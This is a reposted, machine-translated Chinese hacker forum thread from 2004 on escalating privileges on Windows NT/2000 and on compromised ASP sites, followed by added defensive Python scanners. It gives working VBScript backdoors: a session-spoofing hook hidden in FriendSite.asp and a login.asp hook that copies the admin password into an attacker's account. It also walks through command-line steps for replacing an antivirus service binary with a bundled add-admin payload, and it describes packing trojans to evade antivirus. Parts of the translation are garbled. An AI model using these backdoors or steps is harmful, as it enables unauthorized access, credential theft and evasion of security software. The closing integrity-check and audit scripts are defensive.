Method 5: Specify user shell program (Explorer.exe) in WinNT 4 and Windows 2000 registry

There is no absolute path, but use a file name of a relative path (considered compatibility issues).

Since the search order problem of the system startup program makes% SystemDrive% // Explorer.exe executes, this provides an attacker a chance to execute him when the user is next time you log in. Your own procedure.

Question: An attacker must have the write permission to install the system logic with the directory, and the general administrator sets the directory ordinary user forbidden.

Note: This method uses security vulnerabilities for Winnt 4 / Windows 2000 systems to install patch resolution.

Method 6: Trojan: Upload Trojans, then run the Trojan, after the system is restarted, the Trojan is the identity of the local login user, and then the attacker is connected to the user's permissions. Because it is generally always an administrator local login system, this is likely to obtain administrator's permissions.

Problem: (1) Anti-virus software or a virus firewall may prevent the Trojan from running, and may remove it.

(2) Some Trojans cannot run under a Guests-group identity, which may be related to how they set themselves to run automatically: without permission to rewrite the auto-run locations in the registry, or to write to the %system%\system32 directory, they cannot install (most Trojans rename themselves and then copy to the system directory; without write permission to the system directory, the Trojan cannot be executed successfully).

Solution: One can also use a compression program (not an ordinary archiver, but an executable packer: the file becomes smaller yet still runs normally) to compress the Trojan and so escape detection by anti-virus software. I used ASPack to pack a Trojan successfully and it evaded the official release of Kingsoft (Jinshan) Antivirus. Some Trojans, however, cannot be packed with ASPack, such as Glacier (Binghe).

Method 7: GINA (GinaStub) Trojan. Although this is also called a Trojan, its function is very different from the ones above: an ordinary Trojan is installed on the target, and once it runs you use the client to connect to the server side and operate it. GinaStub is generally just a single dynamic link library file, which has to be installed and uninstalled manually. Its function is not to control the server end from a client, but merely to capture the user's login password. Problem: It is more troublesome to install, the chance of success is low, and an improper installation will leave the system unable to boot.

Note: This method does not rely on a security vulnerability in the system, so it cannot be resolved by installing a patch. For GINA, see the separate article "Winlogon Login Management and GINA Introduction".

Method 8: Local overflow. Buffer overflow is the best attack method, because it generally yields SYSTEM or administrator privileges; but many remote overflow attacks do not require running a program beforehand, whereas a local overflow is exactly suited to privilege escalation. The IIS4 ASP extension on WinNT 4 has a local overflow vulnerability, and the Windows 2000 Still Image service also has an overflow vulnerability; using it, an attacker can gain SYSTEM privileges. Of course many programs on Windows NT and Windows 2000 have overflow vulnerabilities, but they are not always running, so the likelihood of exploiting them is relatively small.

Problem: (1) The ASP extension overflow vulnerability requires the attacker to have write permission to the website's script directory, so as to place the attack program on the website and then execute it.

(2) The Still Image service is installed automatically only when the user installs still image devices (such as digital cameras or scanners) on Windows 2000.

Note: This method exploits a security vulnerability in WinNT 4 / Windows 2000; installing the patch resolves it.

Windows 2000-specific privilege escalation vulnerabilities. Method 1: the Windows 2000 input method (IME) vulnerability. Using it, anyone can execute programs as LocalSystem, but the vulnerability is generally limited to people with physical access to the Windows 2000 machine. Of course, if Terminal Services is enabled, an attacker can also exploit it remotely.

Note: This method exploits a security vulnerability in Windows 2000; installing the patch resolves it.

Method 2: Using the Windows 2000 Network DDE DSDM service vulnerability, an ordinary user can run any program as LocalSystem, change passwords, add users, and so on. Guests-group users can also exploit the vulnerability successfully.

Problem: This service is not started by default; it has to be started first.

Note: This method exploits a security vulnerability in Windows 2000; installing the patch resolves it.

Method 3: When the Windows 2000 Telnet service starts a session process, it creates a named pipe and uses it to execute commands. The pipe's name is predictable, however, and if Telnet finds a pipe with that name already existing it uses it directly. An attacker exploits this by creating the pipe name in advance; when Telnet next creates a session process, the attacker's code runs in the LocalSystem context.

Note: This method exploits a security vulnerability in Windows 2000; installing the patch resolves it.

Method 4: Windows 2000 has a vulnerability that uses the debug registers to escalate privileges. If an attacker can run a program on Win2K and exploits this vulnerability, he can at least gain write access to %windir%\system32 and to the HKCR registry hive. Because the x86 debug registers DR0-DR7 are shared globally across all processes, a hardware breakpoint set in one process affects other processes and services.

Note: This method exploits a security vulnerability in Windows 2000, but Microsoft has not yet released a patch, while an exploit program has already appeared, so the only defence is to block the attacker's entry and thereby prevent the vulnerability from being used.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:47:03

- Cleverly using an ASP Trojan to obtain backend management rights (this is a classic ... I haven't posted it before)

Cleverly using an ASP Trojan to obtain backend management rights (this is a classic ... I realized I have already posted it)

Author: aweige. From: Chinese Hacker Red Army

With the Dvbbs ("mobile network") forum upload vulnerability and the recently exposed upload vulnerabilities in various ASP systems, many friends probably have plenty of WebShell "broilers" (compromised hosts), and what people do with them varies from person to person. Some keep escalating privileges and intruding further; some just take a look and move on once the Trojan is in place; and some friends, once the novelty of the WebShell wears off, are drawn to the mystery and temptation of the admin backend. In fact, for many powerful systems, getting into the backend is a fine back door in itself, heh ......... But many of the newer ASP systems now store passwords with MD5 and pair them with strict verification logic. Can we not break through these limits? NO! Let me explain how to break through these restrictions; no more preamble, there is good stuff ahead, FOLLOW ME ..........

Session spoofing

First, let me briefly explain how authentication works in a typical ASP system.

In general, the backend administrator enters the account and password on the login page, and the program looks up that username and password in the database. If an account with that password exists, it treats you as an administrator and gives you a session value that represents your identity. Alternatively, the program first extracts the username and password you submitted, then retrieves the administrator's account and password from the administrator table in the database and compares them with what you submitted; if they match, it gives you the session value indicating your identity. Then every management page you open first verifies your session value: if you are an administrator it lets you through, otherwise it redirects you back to the login page or shows some odd warning, depending on the programmer's personal preferences.

Now that we know the principle, our idea is to modify its code through our ASP Trojan and get ourselves an administrator session, so that even without the administrator's password we can move through the backend unhindered. I call this method session spoofing. Space does not allow describing every system in detail; this article uses the Power Article System as its example.

Power Article System 3.51 (Figure 1)

Figure 1

In fact, every version of the Power Article System can be compromised this way, including PowerEasy. Everyone can practise on their own.

Let's look at its verification code. In Power Article 3.51 the verification page is admin_chklogin.asp.

The verification code is as follows:

..........
Else
    rs("LastLoginIP") = Request.ServerVariables("REMOTE_ADDR")
    rs("LastLoginTime") = Now()
    rs("LoginTimes") = rs("LoginTimes") + 1
    rs.Update
    Session.Timeout = SessionTimeout
    Session("adminName") = rs("UserName")
    rs.Close
    Set rs = Nothing
    Call CloseConn()
    Response.Redirect "admin_index.asp"

The code above the ellipsis verifies the username and password; at the Else branch, if the username and password are correct, it gives you two session values:

    Session.Timeout = SessionTimeout
    Session("adminName") = rs("UserName")

Now let's look at how the other management pages verify the session. admin_index.asp does it like this:

    If Session("adminName") = "" Then
        Response.Redirect "admin_login.asp"
    End If

It looks very strict, but look closer: what it checks is the adminName session value, so as long as our session contains adminName, don't we get through? OK, let's start. First obtain its administrator account name; do I need to teach you that? You can find it on his website, or download the package and look. Then find a page to modify. I picked one hardly anyone looks at, FriendSite.asp (the friendly links page), so the administrator is unlikely to notice. Use the ASP Trojan's edit function to edit it and add a few lines at the bottom of his page:

    Dim id
    id = Trim(Request("qwe"))
    If id = "120" Then
        Session("adminName") = "admin"  ' this is assumed; in practice change it to the administrator account you want
    End If

Simply put, this takes the value of qwe from the address bar, and if qwe = 120 the system gives us a session whose value is admin. OK, let's have a look, Figure 2:

Figure 2

See anything? No? It is still the normal page, but now enter its backend management homepage in the address bar. Isn't it? Figure 3:

Figure 3

Oh, don't do bad things ............

Summary: first get the administrator account, then find its verification page and, based on what it verifies, write the back door we want. Different systems verify differently; the Qingchuang article system, for instance, verifies more than just your username, but our overall approach is the same: give it whatever it verifies.

Password stealing

The method above pales in front of the Dvbbs ("mobile network") forum and other forums, because forums, being highly interactive, have generally put a lot of thought into verification. Take Dvbbs as an example: to log in to the backend, it first checks that you have logged in at the front end, and if you haven't it returns a fake page. After you log in at the front end, the system gives you a session recording your cachename and your ID, then reads it back when you log in to the backend and compares whether front and back match; if they do you pass, otherwise you face the same strict verification. Do we have a way in the face of this? Yes... no (who threw that at me? I wasted your time). But we can think of new ways: since the verification is so strict, what if I simply obtain the password in plain text? So the new idea here is to get its plain-text password. When is there a plain-text password? Yes, when the administrator logs in. OK, that is where we do our work: have it send us the password used at login, and then we log in with that password. Oh, isn't that very much like a sniffer? A few months ago the brothers (Qi Dynasty), with a hardware sniffer on the provincial network security's line, took the provincial website: 4000 GB of hard drives, dozens of servers, in one word: cool. Let's start modifying its code. Edit login.asp and add the following lines:

    If Not IsNull(Trim(Request("UserName"))) Then
        If Request("UserName") = "admin" Then
            sql = "Update [Dv_User] Set UserEmail = (Select UserPassword From [Dv_User] Where UserName = '" & Request("UserName") & "') Where UserName = 'aweige'"
            conn.Execute(sql)
        End If
    End If

These few lines mean: if admin (assumed; in practice change it to the administrator's name) logs in successfully, update the database and put his password into the e-mail field of our own account. Of course you must first register a username on the forum. The result is shown in Figure 4:

Figure 4

Also, the default database admin table name differs somewhat, and version 7.0 and above differ as well, so this cannot be copied verbatim in practice.

Postscript:

For the above two methods I still cannot think of a more effective solution, because once your website has a Trojan on it, there is no way to stop people from inserting code. If you have a good solution, remember to tell me.

Also, I hope nobody goes out to do damage. Back then I really didn't want to see that, and I wish all the network administrators well; I hope you never run into crackers.

[This post has been edited by the author at 2004-12-25 20:51:09]
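Both tricks in the post above come down to a single line added to a page that should never contain it: an assignment to the admin session variable outside the login handler, or an UPDATE against the user table inside login.asp. The audit script below is an added example written for this page (it is not aweige's or vjoy's code) that walks a Classic ASP web root and flags exactly those two shapes. The allow-lists of scripts permitted to do each thing, and the sample files it builds in a temporary directory, are constructed assumptions for the demo; a real site would tailor both.

```python
"""Scan a Classic ASP web root for the two backdoor shapes described above.

Added example, not code from the original post.  Flags (1) any script other
than the login handler that assigns the admin session variable, and (2) any
script outside the account-management scripts that issues an UPDATE against
the user table.  Script names in the allow-lists are assumptions.
"""
import os
import re
import tempfile

ADMIN_SESSION_ASSIGN = re.compile(r'session\s*\(\s*"adminname"\s*\)\s*=', re.I)
USER_TABLE_UPDATE = re.compile(r'\bupdate\s+\[?dv_user\]?', re.I)

# Scripts legitimately allowed to do each thing (assumption; tailor per site).
ALLOWED_SESSION_WRITERS = {"admin_chklogin.asp"}
ALLOWED_USER_UPDATERS = {"user_setup.asp"}


def scan_line(script_name, line):
    """Return a finding string for one source line, or None if it is clean."""
    if line.strip().startswith("'"):          # whole-line VBScript comment
        return None
    name = script_name.lower()
    if ADMIN_SESSION_ASSIGN.search(line) and name not in ALLOWED_SESSION_WRITERS:
        return "admin session assigned outside the login handler"
    if USER_TABLE_UPDATE.search(line) and name not in ALLOWED_USER_UPDATERS:
        return "UPDATE on the user table outside account scripts"
    return None


def audit_asp_tree(root):
    """Walk root and return sorted (relative_path, line_no, finding) tuples."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".asp"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                for line_no, line in enumerate(fh, 1):
                    finding = scan_line(name, line)
                    if finding:
                        findings.append((rel, line_no, finding))
    return sorted(findings)


# Constructed sample site mirroring the post: a legitimate login handler,
# a page carrying the session back door, a login page carrying the UPDATE
# hook, and a legitimate account script that is allowed to UPDATE.
SAMPLE_FILES = {
    "admin/admin_chklogin.asp": (
        'If rs.EOF Then\n'
        '    Response.Redirect "admin_login.asp"\n'
        'Else\n'
        '    Session("adminName") = rs("UserName")\n'
        'End If\n'
    ),
    "friendsite.asp": (
        '<!-- friendly links -->\n'
        'Dim id\n'
        'id = Trim(Request("qwe"))\n'
        'If id = "120" Then\n'
        '    Session("adminName") = "admin"\n'
        'End If\n'
    ),
    "login.asp": (
        'If Request("UserName") = "admin" Then\n'
        '    sql = "Update [Dv_User] Set UserEmail = ..."\n'
        '    conn.Execute(sql)\n'
        'End If\n'
    ),
    "user_setup.asp": (
        'sql = "Update [Dv_User] Set UserEmail = \'" & mail & "\' Where UserID = " & uid\n'
    ),
}


def build_sample_site():
    """Write the constructed sample files into a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="aspaudit_")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, line_no, finding in audit_asp_tree(build_sample_site()):
        print(f"{rel}:{line_no}: {finding}")
```

Run against the constructed site it reports friendsite.asp and login.asp and stays silent on the two allowed scripts. The patterns are deliberately loose (case-insensitive, whitespace-tolerant) because the point is to surface any page that touches authentication state, and a human then reads the hit; tightening them to the exact strings in the post would miss a back door that uses a different variable spelling.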

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:53:13

-

Use ASP Trojans and KV2004 to get administrator privileges

I have never written anything before; this is the first time, so I can't write well. Please forgive me and don't laugh. There is nothing technical here, just a little experience from a rookie. OK, let's start . . . The upfile.asp vulnerability from a while back was quite a sensation, and it really is powerful. I believe many newcomers got a lot of back doors from it, but an ASP Trojan's rights are very limited: deface a few articles, delete a few pictures, and that's about it. Without administrator privileges you let down the master who found this vulnerability. OK, I want to escalate privileges, so let me look! I have tried almost all the privilege-escalation methods found online and none worked; the patches are very complete! Next I used FindPass to extract the administrator's password and failed; FindPass needs administrator privileges. With PsList I saw Rising anti-virus and the Skynet (Tianwang) firewall; most of the tools in the online arsenals are generally useless against them (none of them work).

Escalating privileges under the watch of Rising anti-virus and the Skynet firewall: put a BAT file that adds a user into the Startup group. This method is a bit dumb but has some feasibility; ugh, not enough permission to add it. "Program Files" under C: is not writable, let alone the registry. Depressed, I left a message for the administrator and hurried offline.

The next day I came back to look: the picture had been changed, so the administrator must have found it. This time it won't be easy. I went in through the ASP Trojan and saw that the few EXEs I uploaded yesterday had been deleted, but the ASP Trojan was still alive. But! There was an extra directory on the C: drive called KV2004. It turned out the administrator had uninstalled Rising and installed KV2004, and looking into Program Files confirmed that Rising was gone. (By the way, most anti-virus software installs under C:\Program Files\ by default, but KV installs under C:\kv2004\ by default.) At this point we can bundle our executable with KV2004 so that it starts along with KV. Because KV is not inside "Program Files", "Winnt" or "Documents and Settings", it is very likely that I can modify it, or upload files. Action! Find an HTM file in KV2004 and delete it (to see whether there is write and delete permission):

C:\> del C:\kv2004\Getlicense.htm

access denied

Strange. Let's look at the file attributes:

C:\> attrib C:\kv2004

S  R      C:\kv2004

Oh, it is read-only.

C:\> attrib -r -s C:\kv2004

OK! Try again:

C:\> del C:\kv2004\Getlicense.htm

Success! Write a BAT file that adds an account and escalates privileges, then bundle the BAT file with the KV2004 system service file kvsrvxp.exe (take care to try several bundlers, because KV treats the files produced by many bundlers as viruses). Ready to upload; first delete the original kvsrvxp.exe:

C:\> del C:\kv2004\kvsrvxp.exe

access denied

Maybe kvsrvxp.exe is being used by Windows and cannot be deleted. No way? No: if I can't delete it, I'll rename it.

C:\> ren C:\kv2004\kvsrvxp.exe kv.exe

OK! Then use the ASP Trojan to upload the modified kvsrvxp.exe into kv2004, and go to sleep.

After 4 hours:

net user

Already in the Administrators group. Next shut down the firewall and the anti-virus software, and then you can use Trojans, haha!

I think intrusion has no fixed pattern; analyse each situation on its own. Even anti-virus software can help us. I only offer a way of thinking here; please advise.
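Every post in this thread ends with the same footprint on disk: an edited page (FriendSite.asp, login.asp) or a replaced binary in a directory outside the protected system paths (kvsrvxp.exe in C:\kv2004). A baseline-and-diff integrity check is the cheapest way to see that footprint the next morning, and it is also the "solution" the Password stealing postscript asks for. The script below is an added example written for this page (not the posters' code): it hashes a tree with SHA-256, stores the baseline as JSON, and reports added, removed and modified files. The demo tree and the three changes it makes are constructed to mirror the posts.

```python
"""Baseline-and-diff file integrity check for a web root or program directory.

Added example (not the original posters' code).  Takes a SHA-256 snapshot
of a directory tree and later reports files that were added, removed or
modified, which is how a defender notices an edited page or a replaced
service binary after the fact.  The sample tree below is constructed.
"""
import hashlib
import json
import os
import tempfile


def file_sha256(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    result = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            result[rel] = file_sha256(path)
    return result


def diff_snapshots(baseline, current):
    """Return {'added': [...], 'removed': [...], 'modified': [...]}, each sorted."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "modified": sorted(k for k in base_keys & cur_keys if baseline[k] != current[k]),
    }


def save_baseline(snap, path):
    """Persist a snapshot as JSON (store it off the monitored tree)."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(snap, fh, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def _write(root, rel, data, append=False):
    """Helper for the demo: create or append to a file under root."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "ab" if append else "wb") as fh:
        fh.write(data)


def demo():
    """Build a constructed tree, baseline it, tamper with it, return the diff."""
    root = tempfile.mkdtemp(prefix="fim_tree_")
    _write(root, "wwwroot/friendsite.asp", b"<!-- friendly links -->\r\n")
    _write(root, "wwwroot/login.asp", b"<% ' login form %>\r\n")
    _write(root, "kv2004/kvsrvxp.exe", b"MZ original service binary (constructed)")

    # Keep the baseline outside the tree so it never shows up as a change.
    baseline_path = os.path.join(tempfile.mkdtemp(prefix="fim_base_"), "baseline.json")
    save_baseline(snapshot(root), baseline_path)

    # The three kinds of change the posts describe (all constructed here):
    _write(root, "wwwroot/friendsite.asp", b'Session("adminName") = "admin"\r\n', append=True)
    _write(root, "kv2004/kvsrvxp.exe", b"MZ replaced binary (constructed)")
    _write(root, "wwwroot/upload/unexpected.asp", b"<% ' new file placeholder %>")

    return diff_snapshots(load_baseline(baseline_path), snapshot(root))


if __name__ == "__main__":
    for kind, files in demo().items():
        for rel in files:
            print(f"{kind:9s} {rel}")
```

Two design points matter in practice. The baseline must live somewhere the web process cannot write, otherwise the same upload that plants the back door can refresh the baseline; and the check should cover third-party program directories as well as the web root, since the KV2004 post shows that a product installed outside Program Files can carry weaker permissions than the system paths the administrator locked down.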

Please credit the original source when reposting: https://www.9cbs.com/read-46833.html
